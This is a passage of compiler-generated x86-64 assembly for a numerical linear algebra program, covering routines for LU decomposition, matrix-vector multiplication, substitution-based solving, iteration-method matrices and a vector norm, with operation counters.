%ecx movslq %ecx, %rcx movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero divsd %xmm1, %xmm0 movsd %xmm0, (%rax,%rcx,8) movsd -32(%rbp), %xmm1 ## xmm1 = mem[0],zero movq -40(%rbp), %rax movl -24(%rbp), %ecx imull -12(%rbp), %ecx addl -20(%rbp), %ecx movslq %ecx, %rcx movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero divsd %xmm1, %xmm0 movsd %xmm0, (%rax,%rcx,8) ## %bb.23: ## in Loop: Header=BB4_21 Depth=2 movl -20(%rbp), %eax addl $1, %eax movl %eax, -20(%rbp) jmp LBB4_21 LBB4_24: ## in Loop: Header=BB4_19 Depth=1 movl -24(%rbp), %eax addl $1, %eax movl %eax, -16(%rbp) LBB4_25: ## Parent Loop BB4_19 Depth=1 ## => This Loop Header: Depth=2 ## Child Loop BB4_27 Depth 3 movl -16(%rbp), %eax cmpl -12(%rbp), %eax jge LBB4_32 ## %bb.26: ## in Loop: Header=BB4_25 Depth=2 movq -48(%rbp), %rax movl -16(%rbp), %ecx imull -12(%rbp), %ecx addl -24(%rbp), %ecx movslq %ecx, %rcx movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero movsd %xmm0, -32(%rbp) movl $0, -20(%rbp) LBB4_27: ## Parent Loop BB4_19 Depth=1 ## Parent Loop BB4_25 Depth=2 ## => This Inner Loop Header: Depth=3 movl -20(%rbp), %eax cmpl -12(%rbp), %eax jge LBB4_30 ## %bb.28: ## in Loop: Header=BB4_27 Depth=3 movq -48(%rbp), %rax movl -24(%rbp), %ecx imull -12(%rbp), %ecx addl -20(%rbp), %ecx movslq %ecx, %rcx movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero movsd -32(%rbp), %xmm2 ## xmm2 = mem[0],zero movq -48(%rbp), %rax movl -16(%rbp), %ecx imull -12(%rbp), %ecx addl -20(%rbp), %ecx movslq %ecx, %rcx movsd (%rax,%rcx,8), %xmm1 ## xmm1 = mem[0],zero movq %xmm0, %rdx movabsq $-9223372036854775808, %rsi ## imm = 0x8000000000000000 xorq %rsi, %rdx movq %rdx, %xmm0 mulsd %xmm2, %xmm0 addsd %xmm1, %xmm0 movsd %xmm0, (%rax,%rcx,8) movq -40(%rbp), %rax movl -24(%rbp), %ecx imull -12(%rbp), %ecx addl -20(%rbp), %ecx movslq %ecx, %rcx movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero movsd -32(%rbp), %xmm2 ## xmm2 = mem[0],zero movq -40(%rbp), %rax movl -16(%rbp), %ecx imull -12(%rbp), %ecx addl -20(%rbp), %ecx movslq %ecx, %rcx movsd (%rax,%rcx,8), %xmm1 ## xmm1 = mem[0],zero movq %xmm0, %rdx movabsq $-9223372036854775808, %rsi ## imm = 0x8000000000000000 xorq %rsi, %rdx movq %rdx, %xmm0 mulsd %xmm2, %xmm0 addsd %xmm1, %xmm0 movsd %xmm0, (%rax,%rcx,8) ## %bb.29: ## in Loop: Header=BB4_27 Depth=3 movl -20(%rbp), %eax addl $1, %eax movl %eax, -20(%rbp) jmp LBB4_27 LBB4_30: ## in Loop: Header=BB4_25 Depth=2 jmp LBB4_31 LBB4_31: ## in Loop: Header=BB4_25 Depth=2 movl -16(%rbp), %eax addl $1, %eax movl %eax, -16(%rbp) jmp LBB4_25 LBB4_32: ## in Loop: Header=BB4_19 Depth=1 jmp LBB4_33 LBB4_33: ## in Loop: Header=BB4_19 Depth=1 movl -24(%rbp), %eax addl $1, %eax movl %eax, -24(%rbp) jmp LBB4_19 LBB4_34: movl -12(%rbp), %eax subl $1, %eax movl %eax, -24(%rbp) LBB4_35: ## =>This Loop Header: Depth=1 ## Child Loop BB4_37 Depth 2 ## Child Loop BB4_39 Depth 3 cmpl $0, -24(%rbp) jle LBB4_46 ## %bb.36: ## in Loop: Header=BB4_35 Depth=1 movl -24(%rbp), %eax subl $1, %eax movl %eax, -16(%rbp) LBB4_37: ## Parent Loop BB4_35 Depth=1 ## => This Loop Header: Depth=2 ## Child Loop BB4_39 Depth 3 cmpl $0, -16(%rbp) jl LBB4_44 ## %bb.38: ## in Loop: Header=BB4_37 Depth=2 movq -48(%rbp), %rax movl -16(%rbp), %ecx imull -12(%rbp), %ecx addl -24(%rbp), %ecx movslq %ecx, %rcx movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero movsd %xmm0, -32(%rbp) movl $0, -20(%rbp) LBB4_39: ## Parent Loop BB4_35 Depth=1 ## Parent Loop BB4_37 Depth=2 ## => This Inner Loop Header: Depth=3 movl -20(%rbp), %eax cmpl -12(%rbp), %eax jge LBB4_42 ## %bb.40: ## in Loop: Header=BB4_39 Depth=3 movq -48(%rbp), %rax movl -24(%rbp), %ecx imull -12(%rbp), %ecx addl -20(%rbp), %ecx movslq %ecx, %rcx movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero movsd -32(%rbp), %xmm2 ## xmm2 = mem[0],zero movq -48(%rbp), %rax movl -16(%rbp), %ecx imull -12(%rbp), %ecx addl -20(%rbp), %ecx movslq %ecx, %rcx movsd (%rax,%rcx,8), %xmm1 ## xmm1 = mem[0],zero movq %xmm0, %rdx movabsq $-9223372036854775808, %rsi ## imm = 0x8000000000000000 xorq %rsi, %rdx movq %rdx, %xmm0 mulsd %xmm2, %xmm0 addsd %xmm1, %xmm0 movsd %xmm0, (%rax,%rcx,8) movq -40(%rbp), %rax movl -24(%rbp), %ecx imull -12(%rbp), %ecx addl -20(%rbp), %ecx movslq %ecx, %rcx movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero movsd -32(%rbp), %xmm2 ## xmm2 = mem[0],zero movq -40(%rbp), %rax movl -16(%rbp), %ecx imull -12(%rbp), %ecx addl -20(%rbp), %ecx movslq %ecx, %rcx movsd (%rax,%rcx,8), %xmm1 ## xmm1 = mem[0],zero movq %xmm0, %rdx movabsq $-9223372036854775808, %rsi ## imm = 0x8000000000000000 xorq %rsi, %rdx movq %rdx, %xmm0 mulsd %xmm2, %xmm0 addsd %xmm1, %xmm0 movsd %xmm0, (%rax,%rcx,8) ## %bb.41: ## in Loop: Header=BB4_39 Depth=3 movl -20(%rbp), %eax addl $1, %eax movl %eax, -20(%rbp) jmp LBB4_39 LBB4_42: ## in Loop: Header=BB4_37 Depth=2 jmp LBB4_43 LBB4_43: ## in Loop: Header=BB4_37 Depth=2 movl -16(%rbp), %eax addl $-1, %eax movl %eax, -16(%rbp) jmp LBB4_37 LBB4_44: ## in Loop: Header=BB4_35 Depth=1 jmp LBB4_45 LBB4_45: ## in Loop: Header=BB4_35 Depth=1 movl -24(%rbp), %eax addl $-1, %eax movl %eax, -24(%rbp) jmp LBB4_35 LBB4_46: movq -40(%rbp), %rax addq $48, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _MatrixMul ## -- Begin function MatrixMul .p2align 4, 0x90 _MatrixMul: ## @MatrixMul .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $48, %rsp movq %rdi, -8(%rbp) movq %rsi, -16(%rbp) movl %edx, -20(%rbp) movslq -20(%rbp), %rdi shlq $3, %rdi callq _malloc movq %rax, -32(%rbp) movl $0, -36(%rbp) LBB5_1: ## =>This Loop Header: Depth=1 ## Child Loop BB5_3 Depth 2 movl -36(%rbp), %eax cmpl -20(%rbp), %eax jge LBB5_8 ## %bb.2: ## in Loop: Header=BB5_1 Depth=1 movq -32(%rbp), %rax movslq -36(%rbp), %rcx xorps %xmm0, %xmm0 movsd %xmm0, (%rax,%rcx,8) movl $0, -40(%rbp) LBB5_3: ## Parent Loop BB5_1 Depth=1 ## => This Inner Loop Header: Depth=2 movl -40(%rbp), %eax cmpl -20(%rbp), %eax jge LBB5_6 ## %bb.4: ## in Loop: Header=BB5_3 Depth=2 movq -8(%rbp), %rax movl -36(%rbp), %ecx imull -20(%rbp), %ecx addl -40(%rbp), %ecx movslq %ecx, %rcx movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero movq -16(%rbp), %rax movslq -40(%rbp), %rcx movsd (%rax,%rcx,8), %xmm2 ## xmm2 = mem[0],zero movq -32(%rbp), %rax movslq -36(%rbp), %rcx movsd (%rax,%rcx,8), %xmm1 ## xmm1 = mem[0],zero mulsd %xmm2, %xmm0 addsd %xmm1, %xmm0 movsd %xmm0, (%rax,%rcx,8) ## %bb.5: ## in Loop: Header=BB5_3 Depth=2 movl -40(%rbp), %eax addl $1, %eax movl %eax, -40(%rbp) jmp LBB5_3 LBB5_6: ## in Loop: Header=BB5_1 Depth=1 jmp LBB5_7 LBB5_7: ## in Loop: Header=BB5_1 Depth=1 movl -36(%rbp), %eax addl $1, %eax movl %eax, -36(%rbp) jmp LBB5_1 LBB5_8: movq -32(%rbp), %rax addq $48, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _CreateLUMatrix ## -- Begin function CreateLUMatrix .p2align 4, 0x90 _CreateLUMatrix: ## @CreateLUMatrix .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movq %rdi, -8(%rbp) movl %esi, -12(%rbp) movq %rdx, -24(%rbp) movq %rcx, -32(%rbp) movl $0, -48(%rbp) LBB6_1: ## =>This Inner Loop Header: Depth=1 movl -48(%rbp), %eax cmpl -12(%rbp), %eax jge LBB6_4 ## %bb.2: ## in Loop: Header=BB6_1 Depth=1 movq -8(%rbp), %rax movslq -48(%rbp), %rcx movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero movq -32(%rbp), %rax movq (%rax), %rax movslq -48(%rbp), %rcx movsd %xmm0, (%rax,%rcx,8) movq -8(%rbp), %rax movl -48(%rbp), %ecx imull -12(%rbp), %ecx movslq %ecx, %rcx movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero movq -32(%rbp), %rax movq (%rax), %rax divsd (%rax), %xmm0 movq -24(%rbp), %rax movq (%rax), %rax movl -48(%rbp), %ecx imull -12(%rbp), %ecx movslq %ecx, %rcx movsd %xmm0, (%rax,%rcx,8) movq _luOps2@GOTPCREL(%rip), %rax movl (%rax), %ecx addl $1, %ecx movq _luOps2@GOTPCREL(%rip), %rax movl %ecx, (%rax) ## %bb.3: ## in Loop: Header=BB6_1 Depth=1 movl -48(%rbp), %eax addl $1, %eax movl %eax, -48(%rbp) jmp LBB6_1 LBB6_4: movl $1, -44(%rbp) LBB6_5: ## =>This Loop Header: Depth=1 ## Child Loop BB6_7 Depth 2 ## Child Loop BB6_9 Depth 3 ## Child Loop BB6_13 Depth 3 movl -44(%rbp), %eax cmpl -12(%rbp), %eax jge LBB6_20 ## %bb.6: ## in Loop: Header=BB6_5 Depth=1 movl -44(%rbp), %eax movl %eax, -48(%rbp) LBB6_7: ## Parent Loop BB6_5 Depth=1 ## => This Loop Header: Depth=2 ## Child Loop BB6_9 Depth 3 ## Child Loop BB6_13 Depth 3 movl -48(%rbp), %eax cmpl -12(%rbp), %eax jge LBB6_18 ## %bb.8: ## in Loop: Header=BB6_7 Depth=2 movl $0, -52(%rbp) xorps %xmm0, %xmm0 movsd %xmm0, -40(%rbp) LBB6_9: ## Parent Loop BB6_5 Depth=1 ## Parent Loop BB6_7 Depth=2 ## => This Inner Loop Header: Depth=3 movl -52(%rbp), %eax cmpl -44(%rbp), %eax jge LBB6_12 ## %bb.10: ## in Loop: Header=BB6_9 Depth=3 movq -24(%rbp), %rax movq (%rax), %rax movl -44(%rbp), %ecx imull -12(%rbp), %ecx addl -52(%rbp), %ecx movslq %ecx, %rcx movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero movq -32(%rbp), %rax movq (%rax), %rax movl -52(%rbp), %ecx imull -12(%rbp), %ecx addl -48(%rbp), %ecx movslq %ecx, %rcx movsd (%rax,%rcx,8), %xmm2 ## xmm2 = mem[0],zero movsd -40(%rbp), %xmm1 ## xmm1 = mem[0],zero mulsd %xmm2, %xmm0 addsd %xmm1, %xmm0 movsd %xmm0, -40(%rbp) movq _luOps1@GOTPCREL(%rip), %rax movl (%rax), %ecx addl $1, %ecx movq _luOps1@GOTPCREL(%rip), %rax movl %ecx, (%rax) movq _luOps2@GOTPCREL(%rip), %rax movl (%rax), %ecx addl $1, %ecx movq _luOps2@GOTPCREL(%rip), %rax movl %ecx, (%rax) ## %bb.11: ## in Loop: Header=BB6_9 Depth=3 movl -52(%rbp), %eax addl $1, %eax movl %eax, -52(%rbp) jmp LBB6_9 LBB6_12: ## in Loop: Header=BB6_7 Depth=2 movq -8(%rbp), %rax movl -44(%rbp), %ecx imull -12(%rbp), %ecx addl -48(%rbp), %ecx movslq %ecx, %rcx movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero subsd -40(%rbp), %xmm0 movq -32(%rbp), %rax movq (%rax), %rax movl -44(%rbp), %ecx imull -12(%rbp), %ecx addl -48(%rbp), %ecx movslq %ecx, %rcx movsd %xmm0, (%rax,%rcx,8) movq _luOps1@GOTPCREL(%rip), %rax movl (%rax), %ecx addl $1, %ecx movq _luOps1@GOTPCREL(%rip), %rax movl %ecx, (%rax) movl $0, -52(%rbp) xorps %xmm0, %xmm0 movsd %xmm0, -40(%rbp) LBB6_13: ## Parent Loop BB6_5 Depth=1 ## Parent Loop BB6_7 Depth=2 ## => This Inner Loop Header: Depth=3 movl -52(%rbp), %eax cmpl -44(%rbp), %eax jge LBB6_16 ## %bb.14: ## in Loop: Header=BB6_13 Depth=3 movq -24(%rbp), %rax movq (%rax), %rax movl -48(%rbp), %ecx imull -12(%rbp), %ecx addl -52(%rbp), %ecx movslq %ecx, %rcx movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero movq -32(%rbp), %rax movq (%rax), %rax movl -52(%rbp), %ecx imull -12(%rbp), %ecx addl -44(%rbp), %ecx movslq %ecx, %rcx movsd (%rax,%rcx,8), %xmm2 ## xmm2 = mem[0],zero movsd -40(%rbp), %xmm1 ## xmm1 = mem[0],zero mulsd %xmm2, %xmm0 addsd %xmm1, %xmm0 movsd %xmm0, -40(%rbp) movq _luOps1@GOTPCREL(%rip), %rax movl (%rax), %ecx addl $1, %ecx movq _luOps1@GOTPCREL(%rip), %rax movl %ecx, (%rax) movq _luOps2@GOTPCREL(%rip), %rax movl (%rax), %ecx addl $1, %ecx movq _luOps2@GOTPCREL(%rip), %rax movl %ecx, (%rax) ## %bb.15: ## in Loop: Header=BB6_13 Depth=3 movl -52(%rbp), %eax addl $1, %eax movl %eax, -52(%rbp) jmp LBB6_13 LBB6_16: ## in Loop: Header=BB6_7 Depth=2 movq -8(%rbp), %rax movl -48(%rbp), %ecx imull -12(%rbp), %ecx addl -44(%rbp), %ecx movslq %ecx, %rcx movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero subsd -40(%rbp), %xmm0 movq -32(%rbp), %rax movq (%rax), %rax movl -44(%rbp), %ecx imull -12(%rbp), %ecx addl -44(%rbp), %ecx movslq %ecx, %rcx divsd (%rax,%rcx,8), %xmm0 movq -24(%rbp), %rax movq (%rax), %rax movl -48(%rbp), %ecx imull -12(%rbp), %ecx addl -44(%rbp), %ecx movslq %ecx, %rcx movsd %xmm0, (%rax,%rcx,8) movq _luOps2@GOTPCREL(%rip), %rax movl (%rax), %ecx addl $1, %ecx movq _luOps2@GOTPCREL(%rip), %rax movl %ecx, (%rax) ## %bb.17: ## in Loop: Header=BB6_7 Depth=2 movl -48(%rbp), %eax addl $1, %eax movl %eax, -48(%rbp) jmp LBB6_7 LBB6_18: ## in Loop: Header=BB6_5 Depth=1 jmp LBB6_19 LBB6_19: ## in Loop: Header=BB6_5 Depth=1 movl -44(%rbp), %eax addl $1, %eax movl %eax, -44(%rbp) jmp LBB6_5 LBB6_20: popq %rbp retq .cfi_endproc ## -- End function .globl _Solution ## -- Begin function Solution .p2align 4, 0x90 _Solution: ## @Solution .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $80, %rsp movq %rdi, -8(%rbp) movq %rsi, -16(%rbp) movl %edx, -20(%rbp) movq %rcx, -32(%rbp) movslq -20(%rbp), %rdi shlq $3, %rdi callq _malloc movq %rax, -40(%rbp) movslq -20(%rbp), %rdi shlq $3, %rdi callq _malloc movq %rax, -48(%rbp) movl $11, -68(%rbp) movl $0, -60(%rbp) LBB7_1: ## =>This Loop Header: Depth=1 ## Child Loop BB7_3 Depth 2 movl -60(%rbp), %eax cmpl -20(%rbp), %eax jge LBB7_8 ## %bb.2: ## in Loop: Header=BB7_1 Depth=1 movl $0, -64(%rbp) xorps %xmm0, %xmm0 movsd %xmm0, -56(%rbp) LBB7_3: ## Parent Loop BB7_1 Depth=1 ## => This Inner Loop Header: Depth=2 movl -64(%rbp), %eax cmpl -60(%rbp), %eax jge LBB7_6 ## %bb.4: ## in Loop: Header=BB7_3 Depth=2 movq -8(%rbp), %rax movl -60(%rbp), %ecx imull -20(%rbp), %ecx addl -64(%rbp), %ecx movslq %ecx, %rcx movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero movq -40(%rbp), %rax movslq -64(%rbp), %rcx movsd (%rax,%rcx,8), %xmm2 ## xmm2 = mem[0],zero movsd -56(%rbp), %xmm1 ## xmm1 = mem[0],zero mulsd %xmm2, %xmm0 addsd %xmm1, %xmm0 movsd %xmm0, -56(%rbp) movq _luOps1@GOTPCREL(%rip), %rax movl (%rax), %ecx addl $1, %ecx movq _luOps1@GOTPCREL(%rip), %rax movl %ecx, (%rax) movq _luOps2@GOTPCREL(%rip), %rax movl (%rax), %ecx addl $1, %ecx movq _luOps2@GOTPCREL(%rip), %rax movl %ecx, (%rax) ## %bb.5: ## in Loop: Header=BB7_3 Depth=2 movl -64(%rbp), %eax addl $1, %eax movl %eax, -64(%rbp) jmp LBB7_3 LBB7_6: ## in Loop: Header=BB7_1 Depth=1 movq -32(%rbp), %rax movslq -60(%rbp), %rcx movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero subsd -56(%rbp), %xmm0 movq -40(%rbp), %rax movslq -60(%rbp), %rcx movsd %xmm0, (%rax,%rcx,8) movq _luOps1@GOTPCREL(%rip), %rax movl (%rax), %ecx addl $1, %ecx movq _luOps1@GOTPCREL(%rip), %rax movl %ecx, (%rax) ## %bb.7: ## in Loop: Header=BB7_1 Depth=1 movl -60(%rbp), %eax addl $1, %eax movl %eax, -60(%rbp) jmp LBB7_1 LBB7_8: movl -68(%rbp), %eax movl %eax, -60(%rbp) LBB7_9: ## =>This Loop Header: Depth=1 ## Child Loop BB7_11 Depth 2 cmpl $0, -60(%rbp) jl LBB7_16 ## %bb.10: ## in Loop: Header=BB7_9 Depth=1 movl -60(%rbp), %eax addl $1, %eax movl %eax, -64(%rbp) xorps %xmm0, %xmm0 movsd %xmm0, -56(%rbp) LBB7_11: ## Parent Loop BB7_9 Depth=1 ## => This Inner Loop Header: Depth=2 movl -64(%rbp), %eax cmpl -20(%rbp), %eax jge LBB7_14 ## %bb.12: ## in Loop: Header=BB7_11 Depth=2 movq -16(%rbp), %rax movl -60(%rbp), %ecx imull -20(%rbp), %ecx addl -64(%rbp), %ecx movslq %ecx, %rcx movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero movq -48(%rbp), %rax movslq -64(%rbp), %rcx movsd (%rax,%rcx,8), %xmm2 ## xmm2 = mem[0],zero movsd -56(%rbp), %xmm1 ## xmm1 = mem[0],zero mulsd %xmm2, %xmm0 addsd %xmm1, %xmm0 movsd %xmm0, -56(%rbp) movq _luOps1@GOTPCREL(%rip), %rax movl (%rax), %ecx addl $1, %ecx movq _luOps1@GOTPCREL(%rip), %rax movl %ecx, (%rax) movq _luOps2@GOTPCREL(%rip), %rax movl (%rax), %ecx addl $1, %ecx movq _luOps2@GOTPCREL(%rip), %rax movl %ecx, (%rax) ## %bb.13: ## in Loop: Header=BB7_11 Depth=2 movl -64(%rbp), %eax addl $1, %eax movl %eax, -64(%rbp) jmp LBB7_11 LBB7_14: ## in Loop: Header=BB7_9 Depth=1 movq -40(%rbp), %rax movslq -60(%rbp), %rcx movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero subsd -56(%rbp), %xmm0 movq -16(%rbp), %rax movl -60(%rbp), %ecx imull -20(%rbp), %ecx addl -60(%rbp), %ecx movslq %ecx, %rcx divsd (%rax,%rcx,8), %xmm0 movq -48(%rbp), %rax movslq -60(%rbp), %rcx movsd %xmm0, (%rax,%rcx,8) movq _luOps1@GOTPCREL(%rip), %rax movl (%rax), %ecx addl $1, %ecx movq _luOps1@GOTPCREL(%rip), %rax movl %ecx, (%rax) movq _luOps2@GOTPCREL(%rip), %rax movl (%rax), %ecx addl $1, %ecx movq _luOps2@GOTPCREL(%rip), %rax movl %ecx, (%rax) ## %bb.15: ## in Loop: Header=BB7_9 Depth=1 movl -60(%rbp), %eax addl $-1, %eax movl %eax, -60(%rbp) jmp LBB7_9 LBB7_16: movq -40(%rbp), %rdi callq _free movq -48(%rbp), %rax addq $80, %rsp popq %rbp retq .cfi_endproc ## -- End function .section __TEXT,__literal8,8byte_literals .p2align 3 ## -- Begin function CreateAlphaMatrix LCPI8_0: .quad 0xbff0000000000000 ## double -1 .section __TEXT,__text,regular,pure_instructions .globl _CreateAlphaMatrix .p2align 4, 0x90 _CreateAlphaMatrix: ## @CreateAlphaMatrix .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $32, %rsp movq %rdi, -8(%rbp) movl %esi, -12(%rbp) movslq -12(%rbp), %rdi shlq $3, %rdi movslq -12(%rbp), %rax imulq %rax, %rdi callq _malloc movq %rax, -24(%rbp) movl $0, -28(%rbp) LBB8_1: ## =>This Loop Header: Depth=1 ## Child Loop BB8_3 Depth 2 movl -28(%rbp), %eax cmpl -12(%rbp), %eax jge LBB8_11 ## %bb.2: ## in Loop: Header=BB8_1 Depth=1 movl $0, -32(%rbp) LBB8_3: ## Parent Loop BB8_1 Depth=1 ## => This Inner Loop Header: Depth=2 movl -32(%rbp), %eax cmpl -12(%rbp), %eax jge LBB8_9 ## %bb.4: ## in Loop: Header=BB8_3 Depth=2 movl -32(%rbp), %eax cmpl -28(%rbp), %eax jne LBB8_6 ## %bb.5: ## in Loop: Header=BB8_3 Depth=2 movq -24(%rbp), %rax movl -28(%rbp), %ecx imull -12(%rbp), %ecx addl -32(%rbp), %ecx movslq %ecx, %rcx xorps %xmm0, %xmm0 movsd %xmm0, (%rax,%rcx,8) jmp LBB8_7 LBB8_6: ## in Loop: Header=BB8_3 Depth=2 movq -8(%rbp), %rax movl -28(%rbp), %ecx imull -12(%rbp), %ecx addl -32(%rbp), %ecx movslq %ecx, %rcx movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero movq -8(%rbp), %rax movl -28(%rbp), %ecx imull -12(%rbp), %ecx addl -28(%rbp), %ecx movslq %ecx, %rcx divsd (%rax,%rcx,8), %xmm0 movsd LCPI8_0(%rip), %xmm1 ## xmm1 = mem[0],zero mulsd %xmm1, %xmm0 movq -24(%rbp), %rax movl -28(%rbp), %ecx imull -12(%rbp), %ecx addl -32(%rbp), %ecx movslq %ecx, %rcx movsd %xmm0, (%rax,%rcx,8) movq _itOps2@GOTPCREL(%rip), %rax movl (%rax), %ecx addl $1, %ecx movq _itOps2@GOTPCREL(%rip), %rax movl %ecx, (%rax) LBB8_7: ## in Loop: Header=BB8_3 Depth=2 jmp LBB8_8 LBB8_8: ## in Loop: Header=BB8_3 Depth=2 movl -32(%rbp), %eax addl $1, %eax movl %eax, -32(%rbp) jmp LBB8_3 LBB8_9: ## in Loop: Header=BB8_1 Depth=1 jmp LBB8_10 LBB8_10: ## in Loop: Header=BB8_1 Depth=1 movl -28(%rbp), %eax addl $1, %eax movl %eax, -28(%rbp) jmp LBB8_1 LBB8_11: movq -24(%rbp), %rax addq $32, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _CreateBetaVector ## -- Begin function CreateBetaVector .p2align 4, 0x90 _CreateBetaVector: ## @CreateBetaVector .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $48, %rsp movq %rdi, -8(%rbp) movq %rsi, -16(%rbp) movl %edx, -20(%rbp) movslq -20(%rbp), %rdi shlq $3, %rdi callq _malloc movq %rax, -32(%rbp) movl $0, -36(%rbp) LBB9_1: ## =>This Inner Loop Header: Depth=1 movl -36(%rbp), %eax cmpl -20(%rbp), %eax jge LBB9_4 ## %bb.2: ## in Loop: Header=BB9_1 Depth=1 movq -8(%rbp), %rax movslq -36(%rbp), %rcx movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero movq -16(%rbp), %rax movl -36(%rbp), %ecx imull -20(%rbp), %ecx addl -36(%rbp), %ecx movslq %ecx, %rcx divsd (%rax,%rcx,8), %xmm0 movq -32(%rbp), %rax movslq -36(%rbp), %rcx movsd %xmm0, (%rax,%rcx,8) movq _itOps2@GOTPCREL(%rip), %rax movl (%rax), %ecx addl $1, %ecx movq _itOps2@GOTPCREL(%rip), %rax movl %ecx, (%rax) ## %bb.3: ## in Loop: Header=BB9_1 Depth=1 movl -36(%rbp), %eax addl $1, %eax movl %eax, -36(%rbp) jmp LBB9_1 LBB9_4: movq -32(%rbp), %rax addq $48, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _CreateXVector ## -- Begin function CreateXVector .p2align 4, 0x90 _CreateXVector: ## @CreateXVector .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $48, %rsp movq %rdi, -8(%rbp) movq %rsi, -16(%rbp) movq %rdx, -24(%rbp) movl %ecx, -28(%rbp) movslq -28(%rbp), %rdi shlq $3, %rdi callq _malloc movq %rax, -40(%rbp) movl $0, -44(%rbp) LBB10_1: ## =>This Loop Header: Depth=1 ## Child Loop BB10_3 Depth 2 movl -44(%rbp), %eax cmpl -28(%rbp), %eax jge LBB10_8 ## %bb.2: ## in Loop: Header=BB10_1 Depth=1 movq -8(%rbp), %rax movslq -44(%rbp), %rcx movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero movq -40(%rbp), %rax movslq -44(%rbp), %rcx movsd %xmm0, (%rax,%rcx,8) movl $0, -48(%rbp) LBB10_3: ## Parent Loop BB10_1 Depth=1 ## => This Inner Loop Header: Depth=2 movl -48(%rbp), %eax cmpl -28(%rbp), %eax jge LBB10_6 ## %bb.4: ## in Loop: Header=BB10_3 Depth=2 movq -16(%rbp), %rax movl -44(%rbp), %ecx imull -28(%rbp), %ecx addl -48(%rbp), %ecx movslq %ecx, %rcx movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero movq -24(%rbp), %rax movslq -48(%rbp), %rcx movsd (%rax,%rcx,8), %xmm2 ## xmm2 = mem[0],zero movq -40(%rbp), %rax movslq -44(%rbp), %rcx movsd (%rax,%rcx,8), %xmm1 ## xmm1 = mem[0],zero mulsd %xmm2, %xmm0 addsd %xmm1, %xmm0 movsd %xmm0, (%rax,%rcx,8) movq _itOps1@GOTPCREL(%rip), %rax movl (%rax), %ecx addl $1, %ecx movq _itOps1@GOTPCREL(%rip), %rax movl %ecx, (%rax) movq _itOps2@GOTPCREL(%rip), %rax movl (%rax), %ecx addl $1, %ecx movq _itOps2@GOTPCREL(%rip), %rax movl %ecx, (%rax) ## %bb.5: ## in Loop: Header=BB10_3 Depth=2 movl -48(%rbp), %eax addl $1, %eax movl %eax, -48(%rbp) jmp LBB10_3 LBB10_6: ## in Loop: Header=BB10_1 Depth=1 jmp LBB10_7 LBB10_7: ## in Loop: Header=BB10_1 Depth=1 movl -44(%rbp), %eax addl $1, %eax movl %eax, -44(%rbp) jmp LBB10_1 LBB10_8: movq -40(%rbp), %rax addq $48, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _FindNorm ## -- Begin function FindNorm .p2align 4, 0x90 _FindNorm: ## @FindNorm .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movq %rdi, -8(%rbp) movl %esi, -12(%rbp) xorps %xmm0, %xmm0 movsd %xmm0, -24(%rbp) movl $0, -16(%rbp) LBB11_1: ## =>This Inner Loop Header: Depth=1 movl -16(%rbp), %eax cmpl -12(%rbp), %eax jge LBB11_6 ## %bb.2: ## in Loop: Header=BB11_1 Depth=1 movq -8(%rbp), %rax movslq -16(%rbp), %rcx movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero ucomisd -24(%rbp), %xmm0 jbe LBB11_4 ## %bb.3: ## in Loop: Header=BB11_1 Depth=1 movq -8(%rbp), %rax movslq -16(%rbp), %rcx movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero movsd %xmm0, -24(%rbp) LBB11_4: ## in Loop: Header=BB11_1 Depth=1 jmp LBB11_5 LBB11_5: ## in Loop: Header=BB11_1 Depth=1 movl -16(%rbp), %eax addl $1, %eax movl %eax, -16(%rbp) jmp LBB11_1 LBB11_6: movsd -24(%rbp), %xmm0 ## xmm0 = mem[0],zero popq %rbp retq .cfi_endproc ## -- End function .section __TEXT,__literal16,16byte_literals .p2align 4 ## -- Begin function 